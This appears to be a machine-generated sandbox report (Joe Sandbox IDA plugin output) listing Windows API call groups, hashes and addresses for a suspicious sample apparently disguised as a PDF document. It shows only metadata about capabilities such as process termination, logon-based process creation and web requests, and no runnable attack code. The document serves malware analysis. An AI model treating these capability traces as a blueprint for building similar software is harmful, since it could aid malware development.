                                    • Instruction ID: 2953da7692dbaa9c459828f7cf3aa197c01a34264e680add439c22e86bb428e3
                                    • Opcode Fuzzy Hash: aaa92ed18eb2d759e8407db611ed168e068a2a58d19730bb580854b372dca60d
                                    • Instruction Fuzzy Hash: DA41D071900301AFD720DF26C894FBB7BE8FB4A724F140629F9A5871A1C7369845EB62
                                    APIs
                                    • ShowWindow.USER32(010767B0,00000000,00B95080,?,?,010767B0,?,0103B862,?,?), ref: 0103B9CC
                                    • EnableWindow.USER32(00000000,00000000), ref: 0103B9F0
                                    • ShowWindow.USER32(010767B0,00000000,00B95080,?,?,010767B0,?,0103B862,?,?), ref: 0103BA50
                                    • ShowWindow.USER32(00000000,00000004,?,0103B862,?,?), ref: 0103BA62
                                    • EnableWindow.USER32(00000000,00000001), ref: 0103BA86
                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0103BAA9
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: b3c7194be6b6a38fd060538940304d103bb9c8fc20438ade12dca838798e9ffc
                                    • Instruction ID: f82c3b9acfb8463bc4de929e4ad2297d891296325239c085f6e10888179e86f4
                                    • Opcode Fuzzy Hash: b3c7194be6b6a38fd060538940304d103bb9c8fc20438ade12dca838798e9ffc
                                    • Instruction Fuzzy Hash: 0A416630600541AFDB62CF18C489BA57FE8FF45319F1841E9FA88CF2A6C7319446CB51
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,01025134,?,?,00000000,00000001), ref: 010273BF
                                      • Part of subcall function 01023C94: GetWindowRect.USER32(?,?), ref: 01023CA7
                                    • GetDesktopWindow.USER32 ref: 010273E9
                                    • GetWindowRect.USER32(00000000), ref: 010273F0
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 01027422
                                      • Part of subcall function 010154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
                                    • GetCursorPos.USER32(?), ref: 0102744E
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010274AC
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 6905ab544fa7de6ab804f3f2e962cf3cda95aa9a8fbaeb5a3a0e3737a5604a4c
                                    • Instruction ID: d497da14e220d373d858eb4216cb2a9b40f0b7e9bbc49bd2866675daea748a06
                                    • Opcode Fuzzy Hash: 6905ab544fa7de6ab804f3f2e962cf3cda95aa9a8fbaeb5a3a0e3737a5604a4c
                                    • Instruction Fuzzy Hash: 9931CF72604316ABD720DF68D848F9BBBE9FF99314F00091AF5C997181CB75E908CB92
                                    APIs
                                      • Part of subcall function 010085F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01008608
                                      • Part of subcall function 010085F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01008612
                                      • Part of subcall function 010085F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01008621
                                      • Part of subcall function 010085F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01008628
                                      • Part of subcall function 010085F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0100863E
                                    • GetLengthSid.ADVAPI32(?,00000000,01008977), ref: 01008DAC
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01008DB8
                                    • HeapAlloc.KERNEL32(00000000), ref: 01008DBF
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 01008DD8
                                    • GetProcessHeap.KERNEL32(00000000,00000000,01008977), ref: 01008DEC
                                    • HeapFree.KERNEL32(00000000), ref: 01008DF3
                                    Similarity
                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 3008561057-0
                                    • Opcode ID: f3744fed194ea8adbaa51dccb4a4c91a4a9cd25c0936b6cd809ee23628fbe22d
                                    • Instruction ID: fb389315f4689fafb6413b5da19af353f44ec6b8264bcb8f69811f7b3b047369
                                    • Opcode Fuzzy Hash: f3744fed194ea8adbaa51dccb4a4c91a4a9cd25c0936b6cd809ee23628fbe22d
                                    • Instruction Fuzzy Hash: C411CA31900606EBEB61ABA8DC08BAE7BA9FB51215F10825AE9C597240C7369904DB60
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 01008B2A
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 01008B31
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01008B40
                                    • CloseHandle.KERNEL32(00000004), ref: 01008B4B
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01008B7A
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 01008B8E
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: a41504f3c6c47a19f4a2b7c5643a5974e62be5e91b35924c6a2dab39139cd0da
                                    • Instruction ID: f25f9f5f5cf04889ae287def3dcb391098f2aee61bed27fd984325c46c5cfda6
                                    • Opcode Fuzzy Hash: a41504f3c6c47a19f4a2b7c5643a5974e62be5e91b35924c6a2dab39139cd0da
                                    • Instruction Fuzzy Hash: D1111DB290120AEBEF128F98DD49FDA7BADFB05304F044055FA44A2190C3769D659B61
                                    APIs
                                      • Part of subcall function 00FB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB134D
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB135C
                                      • Part of subcall function 00FB12F3: BeginPath.GDI32(?), ref: 00FB1373
                                      • Part of subcall function 00FB12F3: SelectObject.GDI32(?,00000000), ref: 00FB139C
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0103C1C4
                                    • LineTo.GDI32(00000000,00000003,?), ref: 0103C1D8
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0103C1E6
                                    • LineTo.GDI32(00000000,00000000,?), ref: 0103C1F6
                                    • EndPath.GDI32(00000000), ref: 0103C206
                                    • StrokePath.GDI32(00000000), ref: 0103C216
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 1142ac653c1e1fe23a58effb28017cd72a29c5d060073b696e83270ea5233752
                                    • Instruction ID: ed68200205491d6dee1f15bfa032ddd4172039a4af53f7bfdd9c6360521959b2
                                    • Opcode Fuzzy Hash: 1142ac653c1e1fe23a58effb28017cd72a29c5d060073b696e83270ea5233752
                                    • Instruction Fuzzy Hash: E7115B7680010DBFEF219F94DC88EEA7FACEB08350F048011BA499A165C7769E94DFA0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD03D3
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD03DB
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD03E6
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD03F1
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD03F9
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD0401
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: efcba155b8a19b6cbe53d40afd89f2e6bacbda3e3aed3ee255b774100e5cbe26
                                    • Instruction ID: ea7c4e2322a1f9d0a78ed4bbe6f9f7709495293b4c4aa79e4df4cbf8f70a8db8
                                    • Opcode Fuzzy Hash: efcba155b8a19b6cbe53d40afd89f2e6bacbda3e3aed3ee255b774100e5cbe26
                                    • Instruction Fuzzy Hash: 770148B090175A7DE3008F6A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0101569B
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 010156B1
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 010156C0
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010156CF
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010156D9
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010156E0
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 29d4252d88a5d3af92083f452acef37240a8ee25bf0da557b7feea4027297f9a
                                    • Instruction ID: ef2a190f11b0bde8784af64bc1be69146eca54952ee070804284f556608b5609
                                    • Opcode Fuzzy Hash: 29d4252d88a5d3af92083f452acef37240a8ee25bf0da557b7feea4027297f9a
                                    • Instruction Fuzzy Hash: C9F09631541119BBD3315A62EC0DEEF7B7CEFCBB11F000159F944D1040D7A61A0197B6
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 010174E5
                                    • EnterCriticalSection.KERNEL32(?,?,00FC1044,?,?), ref: 010174F6
                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00FC1044,?,?), ref: 01017503
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FC1044,?,?), ref: 01017510
                                      • Part of subcall function 01016ED7: CloseHandle.KERNEL32(00000000,?,0101751D,?,00FC1044,?,?), ref: 01016EE1
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01017523
                                    • LeaveCriticalSection.KERNEL32(?,?,00FC1044,?,?), ref: 0101752A
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 79a06b2b1bc781826f7c166447d0beb8defe4ce04f9e7cf6d75f6922d3fffa6d
                                    • Instruction ID: 909184b586c90f7e0d24cd55f67b6629487f0466e6806a5411e56d4475419471
                                    • Opcode Fuzzy Hash: 79a06b2b1bc781826f7c166447d0beb8defe4ce04f9e7cf6d75f6922d3fffa6d
                                    • Instruction Fuzzy Hash: 0CF05E3A940613EBEB212B64FD8CDEB7B7EFF45302B000561F682910A9CBBA5405CB51
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01008E7F
                                    • UnloadUserProfile.USERENV(?,?), ref: 01008E8B
                                    • CloseHandle.KERNEL32(?), ref: 01008E94
                                    • CloseHandle.KERNEL32(?), ref: 01008E9C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 01008EA5
                                    • HeapFree.KERNEL32(00000000), ref: 01008EAC
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                    • String ID:
                                    • API String ID: 146765662-0
                                    • Opcode ID: 9f2029f0fe24c01d6e29052c75aa70eb300beab489baa133cbdf4c3d05e6552e
                                    • Instruction ID: 8306b89ae532cb669aa804d0df6781cd671ab3e5abf8dd786ff8f165a4e33fee
                                    • Opcode Fuzzy Hash: 9f2029f0fe24c01d6e29052c75aa70eb300beab489baa133cbdf4c3d05e6552e
                                    • Instruction Fuzzy Hash: 80E0E536404002BBDB112FE2EC0CD0ABF7DFF8A322B108220F259C1068CB3B9424DB52
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 01028928
                                    • CharUpperBuffW.USER32(?,?), ref: 01028A37
                                    • VariantClear.OLEAUT32(?), ref: 01028BAF
                                      • Part of subcall function 01017804: VariantInit.OLEAUT32(00000000), ref: 01017844
                                      • Part of subcall function 01017804: VariantCopy.OLEAUT32(00000000,?), ref: 0101784D
                                      • Part of subcall function 01017804: VariantClear.OLEAUT32(00000000), ref: 01017859
                                    Strings
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: d5480eb75fa975f6f508672d4e8c5f1c8b8606a6b0d0e16e2390eecbca6ede64
                                    • Instruction ID: 5fbe2ebe0d704e6a957577ef0f2600630f00381d4cc2a0c62c34d97d6209cc95
                                    • Opcode Fuzzy Hash: d5480eb75fa975f6f508672d4e8c5f1c8b8606a6b0d0e16e2390eecbca6ede64
                                    • Instruction Fuzzy Hash: 96917F75608301DFC710EF29C88499ABBF8EF89714F04895EF99A8B361DB35E905CB52
                                    APIs
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                    • _memset.LIBCMT ref: 01013077
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 010130A6
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01013159
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01013187
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: ccb0fb8962a53344e7c46ee2357c3d6a947b71d65789c4e1eb46b43344055157
                                    • Instruction ID: 8706ffca6da90fdef22e7de2f4ad55367dddc3f91e125a9a07972dfea9decdae
                                    • Opcode Fuzzy Hash: ccb0fb8962a53344e7c46ee2357c3d6a947b71d65789c4e1eb46b43344055157
                                    • Instruction Fuzzy Hash: FD51E3316083009BE765AF28C844B6BBBF4FF44330F040A6DF9C59A295DB79C9448B52
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0100DAC5
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0100DAFB
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0100DB0C
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0100DB8E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 1417d149fe3278999269f4288e766fdb74b90a14cdc76631090fa5917133be6b
                                    • Instruction ID: acab6a3ce49dfef55fc2fb54d5ea13617549e9111071a56b8706d7cc0bd819cf
                                    • Opcode Fuzzy Hash: 1417d149fe3278999269f4288e766fdb74b90a14cdc76631090fa5917133be6b
                                    • Instruction Fuzzy Hash: C3418FB1600609EFEB16CFD5C884A9ABBF9EF44310F0480A9EE459F285D7B1D940DBB0
                                    APIs
                                    • _memset.LIBCMT ref: 01012CAF
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 01012CCB
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 01012D11
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01076890,00000000), ref: 01012D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: b8b88cdf058683fb0be1a81ab703cf330a348b34f01c173bf596537f6deffbda
                                    • Instruction ID: 3f8d42006286425534fd7be721920e6566b25ae6330ca66503bb03ad20ada4c1
                                    • Opcode Fuzzy Hash: b8b88cdf058683fb0be1a81ab703cf330a348b34f01c173bf596537f6deffbda
                                    • Instruction Fuzzy Hash: 0741AE302043429FD720EF28C844B5ABBE8EF85320F24465EFAA5972D5D778E504CB92
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 010093F6
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01009409
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 01009439
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$_memmove$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 365058703-1403004172
                                    • Opcode ID: bf38d69025bdc1d9e12313abed37053412c232e0f564237ea017418601bbb40f
                                    • Instruction ID: 89e971913c78a50178d009ed4cb8e049d47b150d814c9efc27e663b7887e0b0f
                                    • Opcode Fuzzy Hash: bf38d69025bdc1d9e12313abed37053412c232e0f564237ea017418601bbb40f
                                    • Instruction Fuzzy Hash: C5212671900104BFEB15AB75CC85CFEBBBCDF45354F114119F9A5972E1DF3909099A10
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FED5EC
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • _memset.LIBCMT ref: 00FB418D
                                    • _wcscpy.LIBCMT ref: 00FB41E1
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FB41F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 3942752672-1585850449
                                    • Opcode ID: d0c7eff8c20814fb9361234b5f8776a10a54cba961dc6060e4aa5c5785823e66
                                    • Instruction ID: 204672fcc69e67744b4868179de046f418e438fb3e6c975e2f4ee76b72710cbe
                                    • Opcode Fuzzy Hash: d0c7eff8c20814fb9361234b5f8776a10a54cba961dc6060e4aa5c5785823e66
                                    • Instruction Fuzzy Hash: 7B31ED71808701AAE361EB65DC46BDA77ECAF84300F00451EB185A2092EF79A649EF92
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01021B40
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01021B66
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01021B96
                                    • InternetCloseHandle.WININET(00000000), ref: 01021BDD
                                      • Part of subcall function 01022777: GetLastError.KERNEL32(?,?,01021B0B,00000000,00000000,00000001), ref: 0102278C
                                      • Part of subcall function 01022777: SetEvent.KERNEL32(?,?,01021B0B,00000000,00000000,00000001), ref: 010227A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 2030c4f3b056edc857b8befe877a72675d4af2bf6120a9a66436051e37854b5e
                                    • Instruction ID: 8f39ba160e675d6918c1e2bec8b76474419c601f068e409dbdc9bcdb11e7a0d4
                                    • Opcode Fuzzy Hash: 2030c4f3b056edc857b8befe877a72675d4af2bf6120a9a66436051e37854b5e
                                    • Instruction Fuzzy Hash: 8A21CDB1604219BFEB229F649C85EBF76FCFB49644F00412AF585E3240EB759D0487A1
                                    APIs
                                      • Part of subcall function 00FB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FB1D73
                                      • Part of subcall function 00FB1D35: GetStockObject.GDI32(00000011), ref: 00FB1D87
                                      • Part of subcall function 00FB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB1D91
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 010366D0
                                    • LoadLibraryW.KERNEL32(?), ref: 010366D7
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010366EC
                                    • DestroyWindow.USER32(?), ref: 010366F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 39eece59e35f73fde77ec22a49585b5b06d51a81be8b0692aeda4b36dfe4d138
                                    • Instruction ID: c05a3d8bcf8164e5bea284905dd9268a88c0132694f55bc22482cebd55aaca30
                                    • Opcode Fuzzy Hash: 39eece59e35f73fde77ec22a49585b5b06d51a81be8b0692aeda4b36dfe4d138
                                    • Instruction Fuzzy Hash: 4821CD71200206BFEF124E68EC80EBB77EDFB8D3A4F504629FA9096091D773C950A760
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 0101712B
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0101715D
                                    • GetStdHandle.KERNEL32(000000F6), ref: 0101716E
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010171A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: eca63f0afae58183a91d11276e0972dc979319d2023ccc7659a41ecae01e5f6b
                                    • Instruction ID: fa9af78c444bac507f94a10ceb4607e2b9dec2a1b4f36e67357fe611b43aee88
                                    • Opcode Fuzzy Hash: eca63f0afae58183a91d11276e0972dc979319d2023ccc7659a41ecae01e5f6b
                                    • Instruction Fuzzy Hash: 3221B071A00206ABDB209F6C9C04AAABBE9BF55730F200A59FDE1D72C8D7B59441CB61
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 0101705E
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01017091
                                    • GetStdHandle.KERNEL32(0000000C), ref: 010170A3
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 010170DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: ced38eeec40e15c0a72341935d0a1df7142f43b7d4c8e93bcae746fa8a6ee70f
                                    • Instruction ID: cce018f9860ed772db9a9c041cd1377e23dc9f3676ba13738e892d4569f6df3b
                                    • Opcode Fuzzy Hash: ced38eeec40e15c0a72341935d0a1df7142f43b7d4c8e93bcae746fa8a6ee70f
                                    • Instruction Fuzzy Hash: B721817850030AEBDB219F28DC04A9A7BE8AF44720F204A59FDE0D72D8D7B5A8508B50
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101AEBF
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0101AF13
                                    • __swprintf.LIBCMT ref: 0101AF2C
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0103F910), ref: 0101AF6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
